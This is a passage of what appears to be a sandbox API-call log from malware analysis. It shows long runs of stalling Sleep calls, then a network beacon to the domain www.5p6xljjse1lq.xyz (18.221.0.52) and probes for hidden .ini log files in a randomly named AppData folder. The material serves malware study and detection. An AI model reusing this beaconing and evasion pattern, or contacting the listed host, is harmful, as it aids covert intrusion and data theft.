(dwMilliseconds=0x7d0) [0161.012] Sleep (dwMilliseconds=0x7d0) [0161.013] Sleep (dwMilliseconds=0x7d0) [0161.015] Sleep (dwMilliseconds=0x7d0) [0161.016] Sleep (dwMilliseconds=0x7d0) [0161.018] Sleep (dwMilliseconds=0x7d0) [0161.019] Sleep (dwMilliseconds=0x7d0) [0161.021] Sleep (dwMilliseconds=0x7d0) [0161.022] Sleep (dwMilliseconds=0x7d0) [0161.024] Sleep (dwMilliseconds=0x7d0) [0161.025] Sleep (dwMilliseconds=0x7d0) [0161.027] Sleep (dwMilliseconds=0x7d0) [0161.028] Sleep (dwMilliseconds=0x7d0) [0161.030] Sleep (dwMilliseconds=0x7d0) [0161.031] Sleep (dwMilliseconds=0x7d0) [0161.033] Sleep (dwMilliseconds=0x7d0) [0161.034] Sleep (dwMilliseconds=0x7d0) [0161.036] Sleep (dwMilliseconds=0x7d0) [0161.037] Sleep (dwMilliseconds=0x7d0) [0161.039] Sleep (dwMilliseconds=0x7d0) [0161.040] Sleep (dwMilliseconds=0x7d0) [0161.042] Sleep (dwMilliseconds=0x7d0) [0161.043] Sleep (dwMilliseconds=0x7d0) [0161.045] Sleep (dwMilliseconds=0x7d0) [0161.046] Sleep (dwMilliseconds=0x7d0) [0161.048] Sleep (dwMilliseconds=0x7d0) [0161.049] Sleep (dwMilliseconds=0x7d0) [0161.051] Sleep (dwMilliseconds=0x7d0) [0161.053] Sleep (dwMilliseconds=0x7d0) [0161.055] Sleep (dwMilliseconds=0x7d0) [0161.056] Sleep (dwMilliseconds=0x7d0) [0161.058] Sleep (dwMilliseconds=0x7d0) [0161.059] Sleep (dwMilliseconds=0x7d0) [0161.061] Sleep (dwMilliseconds=0x7d0) [0161.062] Sleep (dwMilliseconds=0x7d0) [0161.064] Sleep (dwMilliseconds=0x7d0) [0161.065] Sleep (dwMilliseconds=0x7d0) [0161.067] Sleep (dwMilliseconds=0x7d0) [0161.068] Sleep (dwMilliseconds=0x7d0) [0161.070] Sleep (dwMilliseconds=0x7d0) [0161.071] Sleep (dwMilliseconds=0x7d0) [0161.073] Sleep (dwMilliseconds=0x7d0) [0161.074] Sleep (dwMilliseconds=0x7d0) [0161.076] Sleep (dwMilliseconds=0x7d0) [0161.077] Sleep (dwMilliseconds=0x7d0) [0161.079] Sleep (dwMilliseconds=0x7d0) [0161.080] Sleep (dwMilliseconds=0x7d0) [0161.082] Sleep (dwMilliseconds=0x7d0) [0161.083] Sleep (dwMilliseconds=0x7d0) [0161.085] Sleep (dwMilliseconds=0x7d0) [0161.086] Sleep (dwMilliseconds=0x7d0) [0161.088] Sleep (dwMilliseconds=0x7d0) [0161.089] Sleep (dwMilliseconds=0x7d0) [0161.091] Sleep (dwMilliseconds=0x7d0) [0161.092] Sleep (dwMilliseconds=0x7d0) [0161.094] Sleep (dwMilliseconds=0x7d0) [0161.095] Sleep (dwMilliseconds=0x7d0) [0161.097] Sleep (dwMilliseconds=0x7d0) [0161.098] Sleep (dwMilliseconds=0x7d0) [0161.100] Sleep (dwMilliseconds=0x7d0) [0161.101] Sleep (dwMilliseconds=0x7d0) [0161.103] Sleep (dwMilliseconds=0x7d0) [0161.104] Sleep (dwMilliseconds=0x7d0) [0161.106] Sleep (dwMilliseconds=0x7d0) [0161.107] Sleep (dwMilliseconds=0x7d0) [0161.109] Sleep (dwMilliseconds=0x7d0) [0161.110] Sleep (dwMilliseconds=0x7d0) [0161.112] Sleep (dwMilliseconds=0x7d0) [0161.113] Sleep (dwMilliseconds=0x7d0) [0161.130] Sleep (dwMilliseconds=0x7d0) [0161.131] Sleep (dwMilliseconds=0x7d0) [0161.133] Sleep (dwMilliseconds=0x7d0) [0161.134] Sleep (dwMilliseconds=0x7d0) [0161.136] Sleep (dwMilliseconds=0x7d0) [0161.137] Sleep (dwMilliseconds=0x7d0) [0161.139] Sleep (dwMilliseconds=0x7d0) [0161.140] Sleep (dwMilliseconds=0x7d0) [0161.142] Sleep (dwMilliseconds=0x7d0) [0161.143] Sleep (dwMilliseconds=0x7d0) [0161.145] Sleep (dwMilliseconds=0x7d0) [0161.146] Sleep (dwMilliseconds=0x7d0) [0161.148] Sleep (dwMilliseconds=0x7d0) [0161.149] Sleep (dwMilliseconds=0x7d0) [0161.151] Sleep (dwMilliseconds=0x7d0) [0161.153] Sleep (dwMilliseconds=0x7d0) [0161.154] Sleep (dwMilliseconds=0x7d0) [0161.156] Sleep (dwMilliseconds=0x7d0) [0161.157] Sleep (dwMilliseconds=0x7d0) [0161.159] Sleep (dwMilliseconds=0x7d0) [0161.160] Sleep (dwMilliseconds=0x7d0) [0161.162] Sleep (dwMilliseconds=0x7d0) [0161.163] Sleep (dwMilliseconds=0x7d0) [0161.165] Sleep (dwMilliseconds=0x7d0) [0161.166] Sleep (dwMilliseconds=0x7d0) [0161.168] Sleep (dwMilliseconds=0x7d0) [0161.169] Sleep (dwMilliseconds=0x7d0) [0161.171] Sleep (dwMilliseconds=0x7d0) [0161.174] Sleep (dwMilliseconds=0x7d0) [0161.176] Sleep (dwMilliseconds=0x7d0) [0161.177] Sleep (dwMilliseconds=0x7d0) [0161.179] Sleep (dwMilliseconds=0x7d0) [0161.180] Sleep (dwMilliseconds=0x7d0) [0161.182] Sleep (dwMilliseconds=0x7d0) [0161.183] Sleep (dwMilliseconds=0x7d0) [0161.185] Sleep (dwMilliseconds=0x7d0) [0161.186] Sleep (dwMilliseconds=0x7d0) [0161.188] Sleep (dwMilliseconds=0x7d0) [0161.189] Sleep (dwMilliseconds=0x7d0) [0161.191] Sleep (dwMilliseconds=0x7d0) [0161.192] Sleep (dwMilliseconds=0x7d0) [0161.194] Sleep (dwMilliseconds=0x7d0) [0161.195] Sleep (dwMilliseconds=0x7d0) [0161.197] Sleep (dwMilliseconds=0x7d0) [0161.198] Sleep (dwMilliseconds=0x7d0) [0161.200] Sleep (dwMilliseconds=0x7d0) [0161.201] Sleep (dwMilliseconds=0x7d0) [0161.203] Sleep (dwMilliseconds=0x7d0) [0161.204] Sleep (dwMilliseconds=0x7d0) [0161.206] Sleep (dwMilliseconds=0x7d0) [0161.207] Sleep (dwMilliseconds=0x7d0) [0161.209] Sleep (dwMilliseconds=0x7d0) [0161.210] Sleep (dwMilliseconds=0x7d0) [0161.212] Sleep (dwMilliseconds=0x7d0) [0161.213] Sleep (dwMilliseconds=0x7d0) [0161.215] Sleep (dwMilliseconds=0x7d0) [0161.216] Sleep (dwMilliseconds=0x7d0) [0161.218] Sleep (dwMilliseconds=0x7d0) [0161.219] Sleep (dwMilliseconds=0x7d0) [0161.221] Sleep (dwMilliseconds=0x7d0) [0161.222] Sleep (dwMilliseconds=0x7d0) [0161.224] Sleep (dwMilliseconds=0x7d0) [0161.225] Sleep (dwMilliseconds=0x7d0) [0161.227] Sleep (dwMilliseconds=0x7d0) [0161.228] Sleep (dwMilliseconds=0x7d0) [0161.230] Sleep (dwMilliseconds=0x7d0) [0161.265] Sleep (dwMilliseconds=0x7d0) [0161.267] Sleep (dwMilliseconds=0x7d0) [0161.268] Sleep (dwMilliseconds=0x7d0) [0161.270] Sleep (dwMilliseconds=0x7d0) [0161.271] Sleep (dwMilliseconds=0x7d0) [0161.273] Sleep (dwMilliseconds=0x7d0) [0161.274] Sleep (dwMilliseconds=0x7d0) [0161.276] Sleep (dwMilliseconds=0x7d0) [0161.277] Sleep (dwMilliseconds=0x7d0) [0161.279] Sleep (dwMilliseconds=0x7d0) [0161.280] Sleep (dwMilliseconds=0x7d0) [0161.282] Sleep (dwMilliseconds=0x7d0) [0161.283] Sleep (dwMilliseconds=0x7d0) [0161.285] Sleep (dwMilliseconds=0x7d0) [0161.286] Sleep (dwMilliseconds=0x7d0) [0161.288] Sleep (dwMilliseconds=0x7d0) [0161.289] Sleep (dwMilliseconds=0x7d0) [0161.291] Sleep (dwMilliseconds=0x7d0) [0161.292] Sleep (dwMilliseconds=0x7d0) [0161.294] Sleep (dwMilliseconds=0x7d0) [0161.295] Sleep (dwMilliseconds=0x7d0) [0161.297] Sleep (dwMilliseconds=0x7d0) [0161.298] Sleep (dwMilliseconds=0x7d0) [0161.300] Sleep (dwMilliseconds=0x7d0) [0161.301] Sleep (dwMilliseconds=0x7d0) [0161.303] Sleep (dwMilliseconds=0x7d0) [0161.305] Sleep (dwMilliseconds=0x7d0) [0161.306] Sleep (dwMilliseconds=0x7d0) [0161.308] Sleep (dwMilliseconds=0x7d0) [0161.309] Sleep (dwMilliseconds=0x7d0) [0161.311] Sleep (dwMilliseconds=0x7d0) [0161.312] Sleep (dwMilliseconds=0x7d0) [0161.314] Sleep (dwMilliseconds=0x7d0) [0161.315] Sleep (dwMilliseconds=0x7d0) [0161.317] Sleep (dwMilliseconds=0x7d0) [0161.318] Sleep (dwMilliseconds=0x7d0) [0161.320] Sleep (dwMilliseconds=0x7d0) [0161.321] Sleep (dwMilliseconds=0x7d0) [0161.323] Sleep (dwMilliseconds=0x7d0) [0161.324] Sleep (dwMilliseconds=0x7d0) [0161.326] Sleep (dwMilliseconds=0x7d0) [0161.329] Sleep (dwMilliseconds=0x7d0) [0161.336] Sleep (dwMilliseconds=0x7d0) [0161.337] Sleep (dwMilliseconds=0x7d0) [0161.339] Sleep (dwMilliseconds=0x7d0) [0161.340] Sleep (dwMilliseconds=0x7d0) [0161.342] Sleep (dwMilliseconds=0x7d0) [0161.343] Sleep (dwMilliseconds=0x7d0) [0161.345] Sleep (dwMilliseconds=0x7d0) [0161.346] Sleep (dwMilliseconds=0x7d0) [0161.348] Sleep (dwMilliseconds=0x7d0) [0161.349] Sleep (dwMilliseconds=0x7d0) [0161.351] Sleep (dwMilliseconds=0x7d0) [0161.353] Sleep (dwMilliseconds=0x7d0) [0161.355] Sleep (dwMilliseconds=0x7d0) [0161.356] Sleep (dwMilliseconds=0x7d0) [0161.358] Sleep (dwMilliseconds=0x7d0) [0161.359] Sleep (dwMilliseconds=0x7d0) [0161.361] Sleep (dwMilliseconds=0x7d0) [0161.362] Sleep (dwMilliseconds=0x7d0) [0161.364] Sleep (dwMilliseconds=0x7d0) [0161.385] Sleep (dwMilliseconds=0x7d0) [0161.391] Sleep (dwMilliseconds=0x7d0) [0161.393] Sleep (dwMilliseconds=0x7d0) [0161.394] Sleep (dwMilliseconds=0x7d0) [0161.398] Sleep (dwMilliseconds=0x7d0) [0161.399] Sleep (dwMilliseconds=0x7d0) [0161.401] Sleep (dwMilliseconds=0x7d0) [0161.402] Sleep (dwMilliseconds=0x7d0) [0161.404] Sleep (dwMilliseconds=0x7d0) [0161.405] Sleep (dwMilliseconds=0x7d0) [0161.407] Sleep (dwMilliseconds=0x7d0) [0161.408] Sleep (dwMilliseconds=0x7d0) [0161.410] Sleep (dwMilliseconds=0x7d0) [0161.411] Sleep (dwMilliseconds=0x7d0) [0161.413] Sleep (dwMilliseconds=0x7d0) [0161.414] Sleep (dwMilliseconds=0x7d0) [0161.416] Sleep (dwMilliseconds=0x7d0) [0161.417] Sleep (dwMilliseconds=0x7d0) [0161.419] Sleep (dwMilliseconds=0x7d0) [0161.420] Sleep (dwMilliseconds=0x7d0) [0161.422] Sleep (dwMilliseconds=0x7d0) [0161.423] Sleep (dwMilliseconds=0x7d0) [0161.425] Sleep (dwMilliseconds=0x7d0) [0161.426] Sleep (dwMilliseconds=0x7d0) [0161.428] Sleep (dwMilliseconds=0x7d0) [0161.429] Sleep (dwMilliseconds=0x7d0) [0161.431] Sleep (dwMilliseconds=0x7d0) [0161.432] Sleep (dwMilliseconds=0x7d0) [0161.434] Sleep (dwMilliseconds=0x7d0) [0161.435] Sleep (dwMilliseconds=0x7d0) [0161.437] Sleep (dwMilliseconds=0x7d0) [0161.438] Sleep (dwMilliseconds=0x7d0) [0161.440] Sleep (dwMilliseconds=0x7d0) [0161.441] Sleep (dwMilliseconds=0x7d0) [0161.443] Sleep (dwMilliseconds=0x7d0) [0161.444] Sleep (dwMilliseconds=0x7d0) [0161.446] Sleep (dwMilliseconds=0x7d0) [0161.447] Sleep (dwMilliseconds=0x7d0) [0161.449] Sleep (dwMilliseconds=0x7d0) [0161.450] Sleep (dwMilliseconds=0x7d0) [0161.453] Sleep (dwMilliseconds=0x7d0) [0161.455] Sleep (dwMilliseconds=0x7d0) [0161.456] Sleep (dwMilliseconds=0x7d0) [0161.458] Sleep (dwMilliseconds=0x7d0) [0161.459] Sleep (dwMilliseconds=0x7d0) [0161.461] Sleep (dwMilliseconds=0x7d0) [0161.462] Sleep (dwMilliseconds=0x7d0) [0161.464] Sleep (dwMilliseconds=0x7d0) [0161.465] Sleep (dwMilliseconds=0x7d0) [0161.467] Sleep (dwMilliseconds=0x7d0) [0161.468] Sleep (dwMilliseconds=0x7d0) [0161.470] Sleep (dwMilliseconds=0x7d0) [0161.471] Sleep (dwMilliseconds=0x7d0) [0161.473] Sleep (dwMilliseconds=0x7d0) [0161.474] Sleep (dwMilliseconds=0x7d0) [0161.476] Sleep (dwMilliseconds=0x7d0) [0161.477] Sleep (dwMilliseconds=0x7d0) [0161.479] Sleep (dwMilliseconds=0x7d0) [0161.480] Sleep (dwMilliseconds=0x7d0) [0161.482] Sleep (dwMilliseconds=0x7d0) [0161.483] Sleep (dwMilliseconds=0x7d0) [0161.485] Sleep (dwMilliseconds=0x7d0) [0161.486] Sleep (dwMilliseconds=0x7d0) [0161.488] Sleep (dwMilliseconds=0x7d0) [0161.490] Sleep (dwMilliseconds=0x7d0) [0161.491] Sleep (dwMilliseconds=0x7d0) [0161.493] Sleep (dwMilliseconds=0x7d0) [0161.494] Sleep (dwMilliseconds=0x7d0) [0161.496] Sleep (dwMilliseconds=0x7d0) [0161.498] Sleep (dwMilliseconds=0x7d0) [0161.499] Sleep (dwMilliseconds=0x7d0) [0161.501] Sleep (dwMilliseconds=0x7d0) [0161.502] Sleep (dwMilliseconds=0x7d0) [0161.504] Sleep (dwMilliseconds=0x7d0) [0161.505] Sleep (dwMilliseconds=0x7d0) [0161.507] Sleep (dwMilliseconds=0x7d0) [0161.508] Sleep (dwMilliseconds=0x7d0) [0161.510] Sleep (dwMilliseconds=0x7d0) [0161.511] Sleep (dwMilliseconds=0x7d0) [0161.514] Sleep (dwMilliseconds=0x7d0) [0161.515] Sleep (dwMilliseconds=0x7d0) [0161.517] Sleep (dwMilliseconds=0x7d0) [0161.518] Sleep (dwMilliseconds=0x7d0) [0161.520] Sleep (dwMilliseconds=0x7d0) [0161.521] Sleep (dwMilliseconds=0x7d0) [0161.523] Sleep (dwMilliseconds=0x7d0) [0161.524] Sleep (dwMilliseconds=0x7d0) [0161.526] Sleep (dwMilliseconds=0x7d0) [0161.527] Sleep (dwMilliseconds=0x7d0) [0161.529] Sleep (dwMilliseconds=0x7d0) [0161.530] Sleep (dwMilliseconds=0x7d0) [0161.532] Sleep (dwMilliseconds=0x7d0) [0161.533] Sleep (dwMilliseconds=0x7d0) [0161.535] Sleep (dwMilliseconds=0x7d0) [0161.536] Sleep (dwMilliseconds=0x7d0) [0161.538] Sleep (dwMilliseconds=0x7d0) [0161.539] Sleep (dwMilliseconds=0x7d0) [0161.541] Sleep (dwMilliseconds=0x7d0) [0161.542] Sleep (dwMilliseconds=0x7d0) [0161.544] Sleep (dwMilliseconds=0x7d0) [0161.545] Sleep (dwMilliseconds=0x7d0) [0161.547] Sleep (dwMilliseconds=0x7d0) [0161.548] Sleep (dwMilliseconds=0x7d0) [0161.550] Sleep (dwMilliseconds=0x7d0) [0161.551] Sleep (dwMilliseconds=0x7d0) [0161.553] Sleep (dwMilliseconds=0x7d0) [0161.555] Sleep (dwMilliseconds=0x7d0) [0161.556] Sleep (dwMilliseconds=0x7d0) [0161.558] Sleep (dwMilliseconds=0x7d0) [0161.559] Sleep (dwMilliseconds=0x7d0) [0161.561] Sleep (dwMilliseconds=0x7d0) [0161.562] Sleep (dwMilliseconds=0x7d0) [0161.564] Sleep (dwMilliseconds=0x7d0) [0161.565] Sleep (dwMilliseconds=0x7d0) [0161.567] Sleep (dwMilliseconds=0x7d0) [0161.568] Sleep (dwMilliseconds=0x7d0) [0161.570] Sleep (dwMilliseconds=0x7d0) [0161.571] Sleep (dwMilliseconds=0x7d0) [0161.573] Sleep (dwMilliseconds=0x7d0) [0161.574] Sleep (dwMilliseconds=0x7d0) [0161.576] Sleep (dwMilliseconds=0x7d0) [0161.577] Sleep (dwMilliseconds=0x7d0) [0161.579] Sleep (dwMilliseconds=0x7d0) [0161.580] Sleep (dwMilliseconds=0x7d0) [0161.582] Sleep (dwMilliseconds=0x7d0) [0161.583] Sleep (dwMilliseconds=0x7d0) [0161.585] Sleep (dwMilliseconds=0x7d0) [0161.586] Sleep (dwMilliseconds=0x7d0) [0161.588] Sleep (dwMilliseconds=0x7d0) [0161.589] Sleep (dwMilliseconds=0x7d0) [0161.591] Sleep (dwMilliseconds=0x7d0) [0161.592] Sleep (dwMilliseconds=0x7d0) [0161.594] Sleep (dwMilliseconds=0x7d0) [0161.595] Sleep (dwMilliseconds=0x7d0) [0161.597] Sleep (dwMilliseconds=0x7d0) [0161.598] Sleep (dwMilliseconds=0x7d0) [0161.600] Sleep (dwMilliseconds=0x7d0) [0161.601] Sleep (dwMilliseconds=0x7d0) [0161.603] Sleep (dwMilliseconds=0x7d0) [0161.604] Sleep (dwMilliseconds=0x7d0) [0161.606] Sleep (dwMilliseconds=0x7d0) [0161.607] Sleep (dwMilliseconds=0x7d0) [0161.609] Sleep (dwMilliseconds=0x7d0) [0161.610] Sleep (dwMilliseconds=0x7d0) [0161.612] Sleep (dwMilliseconds=0x7d0) [0161.613] Sleep (dwMilliseconds=0x7d0) [0161.615] Sleep (dwMilliseconds=0x7d0) [0161.616] Sleep (dwMilliseconds=0x7d0) [0161.618] Sleep (dwMilliseconds=0x7d0) [0161.619] Sleep (dwMilliseconds=0x7d0) [0161.621] Sleep (dwMilliseconds=0x7d0) [0161.622] Sleep (dwMilliseconds=0x7d0) [0161.631] Sleep (dwMilliseconds=0x7d0) [0161.633] Sleep (dwMilliseconds=0x7d0) [0161.635] Sleep (dwMilliseconds=0x7d0) [0161.636] Sleep (dwMilliseconds=0x7d0) [0161.638] Sleep (dwMilliseconds=0x7d0) [0161.639] Sleep (dwMilliseconds=0x7d0) [0161.641] Sleep (dwMilliseconds=0x7d0) [0161.642] Sleep (dwMilliseconds=0x7d0) [0161.644] Sleep (dwMilliseconds=0x7d0) [0161.645] Sleep (dwMilliseconds=0x7d0) [0161.647] Sleep (dwMilliseconds=0x7d0) [0161.648] Sleep (dwMilliseconds=0x7d0) [0161.650] Sleep (dwMilliseconds=0x7d0) [0161.651] Sleep (dwMilliseconds=0x7d0) [0161.654] Sleep (dwMilliseconds=0x7d0) [0161.655] Sleep (dwMilliseconds=0x7d0) [0161.657] Sleep (dwMilliseconds=0x7d0) [0161.658] Sleep (dwMilliseconds=0x7d0) [0161.660] Sleep (dwMilliseconds=0x7d0) [0161.661] Sleep (dwMilliseconds=0x7d0) [0161.663] Sleep (dwMilliseconds=0x7d0) [0161.664] Sleep (dwMilliseconds=0x7d0) [0161.666] Sleep (dwMilliseconds=0x7d0) [0161.667] Sleep (dwMilliseconds=0x7d0) [0161.669] Sleep (dwMilliseconds=0x7d0) [0161.670] Sleep (dwMilliseconds=0x7d0) [0161.672] Sleep (dwMilliseconds=0x7d0) [0161.673] Sleep (dwMilliseconds=0x7d0) [0161.675] Sleep (dwMilliseconds=0x7d0) [0161.677] Sleep (dwMilliseconds=0x7d0) [0161.678] Sleep (dwMilliseconds=0x7d0) [0161.680] Sleep (dwMilliseconds=0x7d0) [0161.681] Sleep (dwMilliseconds=0x7d0) [0161.683] Sleep (dwMilliseconds=0x7d0) [0161.684] Sleep (dwMilliseconds=0x7d0) [0161.686] Sleep (dwMilliseconds=0x7d0) [0161.687] Sleep (dwMilliseconds=0x7d0) [0161.689] Sleep (dwMilliseconds=0x7d0) [0161.690] Sleep (dwMilliseconds=0x7d0) [0161.692] Sleep (dwMilliseconds=0x7d0) [0161.693] Sleep (dwMilliseconds=0x7d0) [0161.695] Sleep (dwMilliseconds=0x7d0) [0161.696] Sleep (dwMilliseconds=0x7d0) [0161.698] Sleep (dwMilliseconds=0x7d0) [0161.699] Sleep (dwMilliseconds=0x7d0) [0161.701] Sleep (dwMilliseconds=0x7d0) [0161.702] Sleep (dwMilliseconds=0x7d0) [0161.704] Sleep (dwMilliseconds=0x7d0) [0161.705] Sleep (dwMilliseconds=0x7d0) [0161.707] Sleep (dwMilliseconds=0x7d0) [0161.708] Sleep (dwMilliseconds=0x7d0) [0161.710] Sleep (dwMilliseconds=0x7d0) [0161.711] Sleep (dwMilliseconds=0x7d0) [0161.713] Sleep (dwMilliseconds=0x7d0) [0161.714] Sleep (dwMilliseconds=0x7d0) [0161.716] Sleep (dwMilliseconds=0x7d0) [0161.717] Sleep (dwMilliseconds=0x7d0) [0161.719] Sleep (dwMilliseconds=0x7d0) [0161.720] Sleep (dwMilliseconds=0x7d0) [0161.722] Sleep (dwMilliseconds=0x7d0) [0161.723] Sleep (dwMilliseconds=0x7d0) [0161.725] Sleep (dwMilliseconds=0x7d0) [0161.726] Sleep (dwMilliseconds=0x7d0) [0161.728] Sleep (dwMilliseconds=0x7d0) [0161.729] Sleep (dwMilliseconds=0x7d0) [0161.731] Sleep (dwMilliseconds=0x7d0) [0161.732] Sleep (dwMilliseconds=0x7d0) [0161.734] Sleep (dwMilliseconds=0x7d0) [0161.735] Sleep (dwMilliseconds=0x7d0) [0161.737] Sleep (dwMilliseconds=0x7d0) [0161.738] Sleep (dwMilliseconds=0x7d0) [0161.740] Sleep (dwMilliseconds=0x7d0) [0161.742] Sleep (dwMilliseconds=0x7d0) [0161.743] Sleep (dwMilliseconds=0x7d0) [0161.745] Sleep (dwMilliseconds=0x7d0) [0161.746] Sleep (dwMilliseconds=0x7d0) [0161.748] Sleep (dwMilliseconds=0x7d0) [0161.749] Sleep (dwMilliseconds=0x7d0) [0161.751] Sleep (dwMilliseconds=0x7d0) [0161.752] Sleep (dwMilliseconds=0x7d0) [0161.755] Sleep (dwMilliseconds=0x7d0) [0161.756] Sleep (dwMilliseconds=0x7d0) [0161.758] Sleep (dwMilliseconds=0x7d0) [0161.759] Sleep (dwMilliseconds=0x7d0) [0161.761] Sleep (dwMilliseconds=0x7d0) [0161.762] Sleep (dwMilliseconds=0x7d0) [0161.764] Sleep (dwMilliseconds=0x7d0) [0161.765] Sleep (dwMilliseconds=0x7d0) [0161.767] Sleep (dwMilliseconds=0x7d0) [0161.768] Sleep (dwMilliseconds=0x7d0) [0161.809] Sleep (dwMilliseconds=0x7d0) [0161.811] Sleep (dwMilliseconds=0x7d0) [0161.813] Sleep (dwMilliseconds=0x7d0) [0161.814] Sleep (dwMilliseconds=0x7d0) [0161.816] socket (af=2, type=1, protocol=6) returned 0x2540 [0161.816] getaddrinfo (in: pNodeName="www.5p6xljjse1lq.xyz", pServiceName="80", pHints=0x8790978*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x87909a8 | out: ppResult=0x87909a8*=0x76a1d80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8883ec0*(sa_family=2, sin_port=0x50, sin_addr="18.221.0.52"), ai_next=0x0)) returned 0 [0162.345] connect (s=0x2540, name=0x8883ec0*(sa_family=2, sin_port=0x50, sin_addr="18.221.0.52"), namelen=16) returned 0 [0162.488] send (s=0x2540, buf=0xa10808a*, len=164, flags=0) returned 164 [0162.489] setsockopt (s=0x2540, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0162.490] recv (in: s=0x2540, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 353 [0162.651] closesocket (s=0x2540) returned 0 [0162.652] Sleep (dwMilliseconds=0x7d0) [0162.653] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.653] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.654] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0162.654] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f3d0) returned 1 [0162.654] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.654] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.654] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0162.654] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894ed10) returned 1 [0162.654] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.654] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.654] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0162.655] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894eda0) returned 1 [0162.655] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.655] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, 